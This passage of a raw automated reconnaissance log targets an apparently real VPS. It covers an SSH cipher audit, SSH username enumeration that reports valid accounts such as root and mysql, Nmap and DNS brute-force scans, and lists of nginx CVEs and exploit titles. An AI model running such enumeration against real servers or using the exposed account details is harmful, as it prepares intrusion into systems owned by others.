55417 160.03 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
55428 161.09 ms be2434.agr21.ams03.atlas.cogentco.com (130.117.2.241)
55439 155.88 ms tata.ams03.atlas.cogentco.com (130.117.15.102)
554410 165.54 ms if-ae-15-2.tcore1.pye-paris.as6453.net (195.219.194.146)
554511 172.60 ms te3-1.ew200-411-cr903.euroweb-network.com (80.231.154.50)
554612 176.90 ms 62.100.128.107
554713 177.45 ms 62.100.128.115
554814 183.21 ms vps2330-cloud.sd-france.net (92.39.247.11)
5549#######################################################################################################################################
5550# general
5551(gen) banner: SSH-2.0-OpenSSH_7.4
5552(gen) software: OpenSSH 7.4
5553(gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
5554(gen) compression: enabled (zlib@openssh.com)
5555
5556# key exchange algorithms
5557(kex) curve25519-sha256 -- [warn] unknown algorithm
5558(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
5559(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
5560 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
5561(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
5562 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
5563(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
5564 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
5565(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
5566 `- [info] available since OpenSSH 4.4
5567(kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
5568(kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
5569(kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
5570 `- [warn] using weak hashing algorithm
5571 `- [info] available since OpenSSH 2.3.0
5572(kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
5573(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
5574 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
5575(kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
5576 `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
5577 `- [warn] using small 1024-bit modulus
5578 `- [warn] using weak hashing algorithm
5579 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
5580
5581# host-key algorithms
5582(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
5583(key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
5584(key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
5585(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
5586 `- [warn] using weak random number generator could reveal the key
5587 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
5588(key) ssh-ed25519 -- [info] available since OpenSSH 6.5
5589
5590# encryption algorithms (ciphers)
5591(enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
5592 `- [info] default cipher since OpenSSH 6.9.
5593(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
5594(enc) aes192-ctr -- [info] available since OpenSSH 3.7
5595(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
5596(enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
5597(enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
5598(enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
5599 `- [warn] using weak cipher mode
5600 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
5601(enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
5602 `- [warn] using weak cipher mode
5603 `- [info] available since OpenSSH 2.3.0
5604(enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
5605 `- [warn] using weak cipher mode
5606 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
5607(enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
5608 `- [fail] disabled since Dropbear SSH 0.53
5609 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
5610 `- [warn] using weak cipher mode
5611 `- [warn] using small 64-bit block size
5612 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
5613(enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
5614 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
5615 `- [warn] using weak cipher mode
5616 `- [warn] using small 64-bit block size
5617 `- [info] available since OpenSSH 2.1.0
5618(enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
5619 `- [warn] using weak cipher
5620 `- [warn] using weak cipher mode
5621 `- [warn] using small 64-bit block size
5622 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
5623
5624# message authentication code algorithms
5625(mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
5626 `- [info] available since OpenSSH 6.2
5627(mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
5628(mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
5629(mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
5630(mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
5631 `- [info] available since OpenSSH 6.2
5632(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
5633 `- [warn] using small 64-bit tag size
5634 `- [info] available since OpenSSH 4.7
5635(mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
5636 `- [info] available since OpenSSH 6.2
5637(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
5638 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
5639(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
5640 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
5641(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
5642 `- [warn] using weak hashing algorithm
5643 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
5644
5645# algorithm recommendations (for OpenSSH 7.4)
5646(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
5647(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
5648(rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
5649(rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
5650(rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
5651(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
5652(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
5653(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
5654(rec) -blowfish-cbc -- enc algorithm to remove
5655(rec) -3des-cbc -- enc algorithm to remove
5656(rec) -aes256-cbc -- enc algorithm to remove
5657(rec) -cast128-cbc -- enc algorithm to remove
5658(rec) -aes192-cbc -- enc algorithm to remove
5659(rec) -aes128-cbc -- enc algorithm to remove
5660(rec) -hmac-sha2-512 -- mac algorithm to remove
5661(rec) -umac-128@openssh.com -- mac algorithm to remove
5662(rec) -hmac-sha2-256 -- mac algorithm to remove
5663(rec) -umac-64@openssh.com -- mac algorithm to remove
5664(rec) -hmac-sha1 -- mac algorithm to remove
5665(rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
5666(rec) -umac-64-etm@openssh.com -- mac algorithm to remove
5667#######################################################################################################################################
5668USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
5669RHOSTS => 92.39.247.11
5670RHOST => 92.39.247.11
5671[*] 92.39.247.11:22 - SSH - Using malformed packet technique
5672[*] 92.39.247.11:22 - SSH - Starting scan
5673[-] 92.39.247.11:22 - SSH - User 'admin' not found
5674[-] 92.39.247.11:22 - SSH - User 'administrator' not found
5675[-] 92.39.247.11:22 - SSH - User 'anonymous' not found
5676[-] 92.39.247.11:22 - SSH - User 'backup' not found
5677[-] 92.39.247.11:22 - SSH - User 'bee' not found
5678[+] 92.39.247.11:22 - SSH - User 'ftp' found
5679[-] 92.39.247.11:22 - SSH - User 'guest' not found
5680[-] 92.39.247.11:22 - SSH - User 'GUEST' not found
5681[-] 92.39.247.11:22 - SSH - User 'info' not found
5682[+] 92.39.247.11:22 - SSH - User 'mail' found
5683[-] 92.39.247.11:22 - SSH - User 'mailadmin' not found
5684[-] 92.39.247.11:22 - SSH - User 'msfadmin' not found
5685[+] 92.39.247.11:22 - SSH - User 'mysql' found
5686[+] 92.39.247.11:22 - SSH - User 'nobody' found
5687[-] 92.39.247.11:22 - SSH - User 'oracle' not found
5688[-] 92.39.247.11:22 - SSH - User 'owaspbwa' not found
5689[+] 92.39.247.11:22 - SSH - User 'postfix' found
5690[-] 92.39.247.11:22 - SSH - User 'postgres' not found
5691[-] 92.39.247.11:22 - SSH - User 'private' not found
5692[-] 92.39.247.11:22 - SSH - User 'proftpd' not found
5693[-] 92.39.247.11:22 - SSH - User 'public' not found
5694[+] 92.39.247.11:22 - SSH - User 'root' found
5695[-] 92.39.247.11:22 - SSH - User 'superadmin' not found
5696[-] 92.39.247.11:22 - SSH - User 'support' not found
5697[-] 92.39.247.11:22 - SSH - User 'sys' not found
5698[-] 92.39.247.11:22 - SSH - User 'system' not found
5699[-] 92.39.247.11:22 - SSH - User 'systemadmin' not found
5700[-] 92.39.247.11:22 - SSH - User 'systemadministrator' not found
5701[-] 92.39.247.11:22 - SSH - User 'test' not found
5702[-] 92.39.247.11:22 - SSH - User 'tomcat' not found
5703[-] 92.39.247.11:22 - SSH - User 'user' not found
5704[-] 92.39.247.11:22 - SSH - User 'webmaster' not found
5705[-] 92.39.247.11:22 - SSH - User 'www-data' not found
5706[-] 92.39.247.11:22 - SSH - User 'Fortimanager_Access' not found
5707[*] Scanned 1 of 1 hosts (100% complete)
5708#######################################################################################################################################
5709Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 10:52 EST
5710Nmap scan report for vps2330-cloud.sd-france.net (92.39.247.11)
5711Host is up (0.18s latency).
5712
5713PORT STATE SERVICE VERSION
571453/tcp open domain (unknown banner: none)
5715|_dns-fuzz: Server didn't response to our probe, can't fuzz
5716| dns-nsec-enum:
5717|_ No NSEC records found
5718| dns-nsec3-enum:
5719|_ DNSSEC NSEC3 not supported
5720| dns-nsid:
5721|_ bind.version: none
5722| fingerprint-strings:
5723| DNSVersionBindReqTCP:
5724| version
5725| bind
5726|_ none
57271 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
5728SF-Port53-TCP:V=7.80%I=7%D=11/25%Time=5DDBF8D6%P=x86_64-pc-linux-gnu%r(DNS
5729SF:VersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\
5730SF:x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c
5731SF:\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
5732Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
5733Device type: general purpose
5734Running (JUST GUESSING): Linux 3.X|4.X (90%)
5735OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4.4
5736Aggressive OS guesses: Linux 3.10 - 3.16 (90%), Linux 3.10 - 3.12 (89%), Linux 4.4 (89%), Linux 3.10 (88%), Linux 4.0 (88%), Linux 4.9 (87%)
5737No exact OS matches for host (test conditions non-ideal).
5738Network Distance: 14 hops
5739
5740Host script results:
5741| dns-brute:
5742| DNS Brute-force hostnames:
5743| ns1.sd-france.net - 81.93.250.111
5744| dns1.sd-france.net - 81.93.250.111
5745| ns2.sd-france.net - 213.246.39.64
5746| ns3.sd-france.net - 213.215.46.50
5747|_ www.sd-france.net - 81.93.243.201
5748
5749TRACEROUTE (using port 53/tcp)
5750HOP RTT ADDRESS
57511 132.04 ms 10.245.200.1
57522 ...
57533 132.10 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
57544 132.10 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
57555 133.03 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
57566 151.86 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
57577 157.14 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
57588 157.12 ms be2440.agr21.ams03.atlas.cogentco.com (130.117.50.6)
57599 156.71 ms tata.ams03.atlas.cogentco.com (130.117.15.102)
576010 166.36 ms if-ae-15-2.tcore1.pye-paris.as6453.net (195.219.194.146)
576111 174.02 ms te3-1.ew200-411-cr903.euroweb-network.com (80.231.154.50)
576212 177.35 ms 62.100.128.107
576313 186.20 ms 62.100.128.115
576414 187.59 ms vps2330-cloud.sd-france.net (92.39.247.11)
5765#######################################################################################################################################
5766wig - WebApp Information Gatherer
5767
5768
5769Scanning http://92.39.247.11...
5770_________________________________________ SITE INFO _________________________________________
5771IP Title
577292.39.247.11 Web Server's Default Page
5773
5774__________________________________________ VERSION __________________________________________
5775Name Versions Type
5776Apache 2.4.10 | 2.4.11 | 2.4.12 | 2.4.5 | 2.4.6 | 2.4.7 | 2.4.8 Platform
5777 2.4.9
5778nginx Platform
5779
5780_____________________________________________________________________________________________
5781Time: 39.5 sec Urls: 811 Fingerprints: 40401
5782######################################################################################################################################
5783Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 10:54 EST
5784NSE: Loaded 163 scripts for scanning.
5785NSE: Script Pre-scanning.
5786Initiating NSE at 10:54
5787Completed NSE at 10:54, 0.00s elapsed
5788Initiating NSE at 10:54
5789Completed NSE at 10:54, 0.00s elapsed
5790Initiating Parallel DNS resolution of 1 host. at 10:54
5791Completed Parallel DNS resolution of 1 host. at 10:54, 0.02s elapsed
5792Initiating SYN Stealth Scan at 10:54
5793Scanning vps2330-cloud.sd-france.net (92.39.247.11) [1 port]
5794Discovered open port 80/tcp on 92.39.247.11
5795Completed SYN Stealth Scan at 10:54, 0.21s elapsed (1 total ports)
5796Initiating Service scan at 10:54
5797Scanning 1 service on vps2330-cloud.sd-france.net (92.39.247.11)
5798Completed Service scan at 10:54, 6.38s elapsed (1 service on 1 host)
5799Initiating OS detection (try #1) against vps2330-cloud.sd-france.net (92.39.247.11)
5800Retrying OS detection (try #2) against vps2330-cloud.sd-france.net (92.39.247.11)
5801Initiating Traceroute at 10:54
5802Completed Traceroute at 10:54, 3.01s elapsed
5803Initiating Parallel DNS resolution of 13 hosts. at 10:54
5804Completed Parallel DNS resolution of 13 hosts. at 10:54, 0.24s elapsed
5805NSE: Script scanning 92.39.247.11.
5806Initiating NSE at 10:54
5807Completed NSE at 10:55, 45.63s elapsed
5808Initiating NSE at 10:55
5809Completed NSE at 10:55, 0.75s elapsed
5810Nmap scan report for vps2330-cloud.sd-france.net (92.39.247.11)
5811Host is up (0.18s latency).
5812
5813PORT STATE SERVICE VERSION
581480/tcp open http nginx
5815| http-brute:
5816|_ Path "/" does not require authentication
5817|_http-chrono: Request times for /; avg: 807.09ms; min: 769.42ms; max: 852.21ms
5818|_http-csrf: Couldn't find any CSRF vulnerabilities.
5819|_http-date: Mon, 25 Nov 2019 15:54:28 GMT; -1s from local time.
5820|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
5821|_http-dombased-xss: Couldn't find any DOM based XSS.
5822|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
5823|_http-errors: Couldn't find any error pages.
5824|_http-feed: Couldn't find any feeds.
5825|_http-fetch: Please enter the complete path of the directory to save data in.
5826| http-headers:
5827| Server: nginx
5828| Date: Mon, 25 Nov 2019 15:54:30 GMT
5829| Content-Type: text/html
5830| Content-Length: 3734
5831| Connection: close
5832| Last-Modified: Mon, 01 Apr 2019 15:47:08 GMT
5833| ETag: "e96-58579eee02177"
5834| Accept-Ranges: bytes
5835|
5836|_ (Request type: HEAD)
5837|_http-jsonp-detection: Couldn't find any JSONP endpoints.
5838| http-methods:
5839|_ Supported Methods: GET HEAD POST OPTIONS
5840|_http-mobileversion-checker: No mobile version detected.
5841| http-php-version: Logo query returned unknown hash fdae9c5d1a897cec8782556f059b1349
5842|_Credits query returned unknown hash fdae9c5d1a897cec8782556f059b1349
5843|_http-security-headers:
5844| http-sitemap-generator:
5845| Directory structure:
5846| /
5847| Other: 1; ico: 1
5848| /css/
5849| css: 1
5850| /img/
5851| png: 1
5852| Longest directory structure:
5853| Depth: 1
5854| Dir: /css/
5855| Total files found (by extension):
5856|_ Other: 1; css: 1; ico: 1; png: 1
5857|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
5858|_http-title: Web Server's Default Page
5859| http-vhosts:
5860|_127 names had status 200
5861|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
5862|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
5863|_http-xssed: No previously reported XSS vuln.
5864| vulscan: VulDB - https://vuldb.com:
5865| [133852] Sangfor Sundray WLAN Controller up to 3.7.4.2 Cookie Header nginx_webconsole.php Code Execution
5866| [132132] SoftNAS Cloud 4.2.0/4.2.1 Nginx privilege escalation
5867| [131858] Puppet Discovery up to 1.3.x Nginx Container weak authentication
5868| [130644] Nginx Unit up to 1.7.0 Router Process Request Heap-based memory corruption
5869| [127759] VeryNginx 0.3.3 Web Application Firewall privilege escalation
5870| [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module Loop denial of service
5871| [126524] nginx up to 1.14.0/1.15.5 HTTP2 CPU Exhaustion denial of service
5872| [126523] nginx up to 1.14.0/1.15.5 HTTP2 Memory Consumption denial of service
5873| [119845] Pivotal Operations Manager up to 2.0.13/2.1.5 Nginx privilege escalation
5874| [114368] SuSE Portus 2.3 Nginx Certificate weak authentication
5875| [103517] nginx up to 1.13.2 Range Filter Request Integer Overflow memory corruption
5876| [89849] nginx RFC 3875 Namespace Conflict Environment Variable Open Redirect
5877| [87719] nginx up to 1.11.0 ngx_files.c ngx_chain_to_iovec denial of service
5878| [80760] nginx 0.6.18/1.9.9 DNS CNAME Record Crash denial of service
5879| [80759] nginx 0.6.18/1.9.9 DNS CNAME Record Use-After-Free denial of service
5880| [80758] nginx 0.6.18/1.9.9 DNS UDP Packet Crash denial of service
5881| [67677] nginx up to 1.7.3 SSL weak authentication
5882| [67296] nginx up to 1.7.3 SMTP Proxy ngx_mail_smtp_starttls privilege escalation
5883| [12822] nginx up to 1.5.11 SPDY SPDY Request Heap-based memory corruption
5884| [12824] nginx 1.5.10 on 32-bit SPDY memory corruption
5885| [11237] nginx up to 1.5.6 URI String Bypass privilege escalation
5886| [65364] nginx up to 1.1.13 Default Configuration information disclosure
5887| [8671] nginx up to 1.4 proxy_pass denial of service
5888| [8618] nginx 1.3.9/1.4.0 http/ngx_http_parse.c ngx_http_parse_chunked() memory corruption
5889| [7247] nginx 1.2.6 Proxy Function spoofing
5890| [61434] nginx 1.2.0/1.3.0 on Windows Access Restriction privilege escalation
5891| [5293] nginx up to 1.1.18 ngx_http_mp4_module MP4 File memory corruption
5892| [4843] nginx up to 1.0.13/1.1.16 HTTP Header Response Parser ngx_http_parse.c information disclosure
5893| [59645] nginx up to 0.8.9 Heap-based memory corruption
5894| [53592] nginx 0.8.36 memory corruption
5895| [53590] nginx up to 0.8.9 unknown vulnerability
5896| [51533] nginx 0.7.64 Terminal privilege escalation
5897| [50905] nginx up to 0.8.9 directory traversal
5898| [50903] nginx up to 0.8.10 NULL Pointer Dereference denial of service
5899| [50043] nginx up to 0.8.10 memory corruption
5900|
5901| MITRE CVE - https://cve.mitre.org:
5902| [CVE-2013-2070] http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028.
5903| [CVE-2013-2028] The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow.
5904| [CVE-2012-3380] Directory traversal vulnerability in naxsi-ui/nx_extract.py in the Naxsi module before 0.46-1 for Nginx allows local users to read arbitrary files via unspecified vectors.
5905| [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file.
5906| [CVE-2012-1180] Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request.
5907| [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request.
5908| [CVE-2011-4315] Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response.
5909| [CVE-2010-2266] nginx 0.8.36 allows remote attackers to cause a denial of service (crash) via certain encoded directory traversal sequences that trigger memory corruption, as demonstrated using the "%c0.%c0." sequence.
5910| [CVE-2010-2263] nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI.
5911| [CVE-2009-4487] nginx 0.7.64 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator.
5912| [CVE-2009-3898] Directory traversal vulnerability in src/http/modules/ngx_http_dav_module.c in nginx (aka Engine X) before 0.7.63, and 0.8.x before 0.8.17, allows remote authenticated users to create or overwrite arbitrary files via a .. (dot dot) in the Destination HTTP header for the WebDAV (1) COPY or (2) MOVE method.
5913| [CVE-2009-3896] src/http/ngx_http_parse.c in nginx (aka Engine X) 0.1.0 through 0.4.14, 0.5.x before 0.5.38, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.14 allows remote attackers to cause a denial of service (NULL pointer dereference and worker process crash) via a long URI.
5914| [CVE-2009-2629] Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests.
5915|
5916| SecurityFocus - https://www.securityfocus.com/bid/:
5917| [99534] Nginx CVE-2017-7529 Remote Integer Overflow Vulnerability
5918| [93903] Nginx CVE-2016-1247 Remote Privilege Escalation Vulnerability
5919| [91819] Nginx CVE-2016-1000105 Security Bypass Vulnerability
5920| [90967] nginx CVE-2016-4450 Denial of Service Vulnerability
5921| [82230] nginx Multiple Denial of Service Vulnerabilities
5922| [78928] Nginx CVE-2010-2266 Denial-Of-Service Vulnerability
5923| [70025] nginx CVE-2014-3616 SSL Session Fixation Vulnerability
5924| [69111] nginx SMTP Proxy Remote Command Injection Vulnerability
5925| [67507] nginx SPDY Implementation CVE-2014-0088 Arbitrary Code Execution Vulnerability
5926| [66537] nginx SPDY Implementation Heap Based Buffer Overflow Vulnerability
5927| [63814] nginx CVE-2013-4547 URI Processing Security Bypass Vulnerability
5928| [59824] Nginx CVE-2013-2070 Remote Security Vulnerability
5929| [59699] nginx 'ngx_http_parse.c' Stack Buffer Overflow Vulnerability
5930| [59496] nginx 'ngx_http_close_connection()' Remote Integer Overflow Vulnerability
5931| [59323] nginx NULL-Byte Arbitrary Code Execution Vulnerability
5932| [58105] Nginx 'access.log' Insecure File Permissions Vulnerability
5933| [57139] nginx CVE-2011-4968 Man in The Middle Vulnerability
5934| [55920] nginx CVE-2011-4963 Security Bypass Vulnerability
5935| [54331] Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability
5936| [52999] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
5937| [52578] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
5938| [50710] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
5939| [40760] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
5940| [40434] nginx Space String Remote Source Code Disclosure Vulnerability
5941| [40420] nginx Directory Traversal Vulnerability
5942| [37711] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
5943| [36839] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
5944| [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities
5945| [36438] nginx Proxy DNS Cache Domain Spoofing Vulnerability
5946| [36384] nginx HTTP Request Remote Buffer Overflow Vulnerability
5947|
5948| IBM X-Force - https://exchange.xforce.ibmcloud.com:
5949| [84623] Phusion Passenger gem for Ruby with nginx configuration insecure permissions
5950| [84172] nginx denial of service
5951| [84048] nginx buffer overflow
5952| [83923] nginx ngx_http_close_connection() integer overflow
5953| [83688] nginx null byte code execution
5954| [83103] Naxsi module for Nginx naxsi_unescape_uri() function security bypass
5955| [82319] nginx access.log information disclosure
5956| [80952] nginx SSL spoofing
5957| [77244] nginx and Microsoft Windows request security bypass
5958| [76778] Naxsi module for Nginx nx_extract.py directory traversal
5959| [74831] nginx ngx_http_mp4_module.c buffer overflow
5960| [74191] nginx ngx_cpystrn() information disclosure
5961| [74045] nginx header response information disclosure
5962| [71355] nginx ngx_resolver_copy() buffer overflow
5963| [59370] nginx characters denial of service
5964| [59369] nginx DATA source code disclosure
5965| [59047] nginx space source code disclosure
5966| [58966] nginx unspecified directory traversal
5967| [54025] nginx ngx_http_parse.c denial of service
5968| [53431] nginx WebDAV component directory traversal
5969| [53328] Nginx CRC-32 cached domain name spoofing
5970| [53250] Nginx ngx_http_parse_complex_uri() function code execution
5971|
5972| Exploit-DB - https://www.exploit-db.com:
5973| [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
5974| [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow
5975| [25499] nginx 1.3.9-1.4.0 DoS PoC
5976| [24967] nginx 0.6.x Arbitrary Code Execution NullByte Injection
5977| [14830] nginx 0.6.38 - Heap Corruption Exploit
5978| [13822] Nginx <= 0.7.65 / 0.8.39 (dev) Source Disclosure / Download Vulnerability
5979| [13818] Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities
5980| [12804] nginx [engine x] http server <= 0.6.36 Path Draversal
5981| [9901] nginx 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14 PoC
5982| [9829] nginx 0.7.61 WebDAV directory traversal
5983|
5984| OpenVAS (Nessus) - http://www.openvas.org:
5985| [864418] Fedora Update for nginx FEDORA-2012-3846
5986| [864310] Fedora Update for nginx FEDORA-2012-6238
5987| [864209] Fedora Update for nginx FEDORA-2012-6411
5988| [864204] Fedora Update for nginx FEDORA-2012-6371
5989| [864121] Fedora Update for nginx FEDORA-2012-4006
5990| [864115] Fedora Update for nginx FEDORA-2012-3991
5991| [864065] Fedora Update for nginx FEDORA-2011-16075
5992| [863654] Fedora Update for nginx FEDORA-2011-16110
5993| [861232] Fedora Update for nginx FEDORA-2007-1158
5994| [850180] SuSE Update for nginx openSUSE-SU-2012:0237-1 (nginx)
5995| [831680] Mandriva Update for nginx MDVSA-2012:043 (nginx)
5996| [802045] 64-bit Debian Linux Rootkit with nginx Doing iFrame Injection
5997| [801636] nginx HTTP Request Remote Buffer Overflow Vulnerability
5998| [103470] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
5999| [103469] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
6000| [103344] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
6001| [100676] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
6002| [100659] nginx Directory Traversal Vulnerability
6003| [100658] nginx Space String Remote Source Code Disclosure Vulnerability
6004| [100441] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
6005| [100321] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
6006| [100277] nginx Proxy DNS Cache Domain Spoofing Vulnerability
6007| [100276] nginx HTTP Request Remote Buffer Overflow Vulnerability
6008| [100275] nginx WebDAV Multiple Directory Traversal Vulnerabilities
6009| [71574] Gentoo Security Advisory GLSA 201206-07 (nginx)
6010| [71308] Gentoo Security Advisory GLSA 201203-22 (nginx)
6011| [71297] FreeBSD Ports: nginx
6012| [71276] FreeBSD Ports: nginx
6013| [71239] Debian Security Advisory DSA 2434-1 (nginx)
6014| [66451] Fedora Core 11 FEDORA-2009-12782 (nginx)
6015| [66450] Fedora Core 10 FEDORA-2009-12775 (nginx)
6016| [66449] Fedora Core 12 FEDORA-2009-12750 (nginx)
6017| [64924] Gentoo Security Advisory GLSA 200909-18 (nginx)
6018| [64912] Fedora Core 10 FEDORA-2009-9652 (nginx)
6019| [64911] Fedora Core 11 FEDORA-2009-9630 (nginx)
6020| [64894] FreeBSD Ports: nginx
6021| [64869] Debian Security Advisory DSA 1884-1 (nginx)
6022|
6023| SecurityTracker - https://www.securitytracker.com:
